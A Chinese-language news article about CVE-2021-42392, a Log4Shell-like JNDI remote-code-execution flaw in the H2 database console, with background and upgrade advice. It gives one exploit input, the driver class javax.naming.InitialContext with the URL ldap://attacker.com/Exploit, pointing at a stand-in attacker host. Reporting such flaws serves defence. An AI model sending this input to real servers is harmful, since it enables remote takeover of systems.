H2数据库发现类似Log4Shell的漏洞

码农 • 2023年9月23日 17:30 • 投稿

去年底爆发的Apache Log4j软件漏洞，让全球资安及服务器管理员至今仍忙得不可开交，安全厂商JFrog又发现另一个常用软件H2数据库，也有类似Log4Shell的远程代码执行（RCE）漏洞，呼吁用户立即升级到最新的2.0.206版本。

这家安全厂商去年12月在H2数据库控制台（console）发现到的漏洞（编号CVE-2021-42392），和Log4Shell（JNDI remote class loading）根本原因相同。使未经授权的攻击者可传送经改造的参数、触发目标服务器的漏洞，而在受害机器上远程执行代码。 CVE-2021-42392的风险值尚未给定，研究人员解释，是因为最新漏洞被开采风险尚难确认。

H2是开源Java SQL数据库，以其轻巧、执行于内存内，不需数据储存在磁盘内而受许多开发人员欢迎，也广泛用于多种项目中，像是Web平台项目Spring Boot或是IoT项目ThingWorks。 com.h2database：h2并以将700项成品（artifact）相依，而名列Maven套件库中前5大套件之林。

CVE-2021-42392漏洞出在H2数据库框架里多条代码路径，在未经过滤下将攻击者控制、变造的URL，传送到控制台上的javax.naming.Context.lookup函式，允许加载远程程序，即Java代码注入或RCE。

研究人员进一步解释，org.h2.util.JdbcUtils.getConnection方法可加入驱动程序类别（driver class）及数据库URL。如果驱动程序类别可被指派为javax.naming.Context类，则攻击者可建立对象实例（inisantiate）及呼叫查询方法。此时若提供的驱动程序类别是javax.naming.InitialContext及URL： ldap://attacker.com/Exploit，则可导致RCE、甚至接管系统。

不过它和Log4Shell风险还是一段差距。研究人员说明，首先，处理恶意呼叫的目标机器必须是跑H2控制台（console）的服务器。许多厂商和企业可能有H2数据库，但不见得有H2控制台。这就缩减了潜在受害者的广度。另外，香草（vanilla）版H2数据库中，H2控制台预设只听取本地主机连线，不会受远程攻击，但是它也可变更为听取远程连线。

研究人员指出，如果本地区域网络（LAN）、甚至广域网络（WAN）上跑H2控制台软件的服务器有这漏洞的话，后果相当严重。研究人员也呼吁用户立即升级到已解决漏洞的最新2.0.206版本，原因在于有其他攻击渠道，同时遭开采风险尚难确认。

在Log4Shell漏洞方面，Log4j修补版本公布一个月后，黑客攻击活动仍然猛烈。微软本周指出，12月几个星期间试图开采漏洞的活动仍然频繁，他们观察到攻击者涵括、伊朗、朝鲜、土耳其及俄罗斯等国家支持的黑客组织，及以获利为目的犯罪组织。美国联邦交易委员会（FTC）警告，若因未修补漏洞而致客户个资外泄或财务损失，可能遭FTC提告。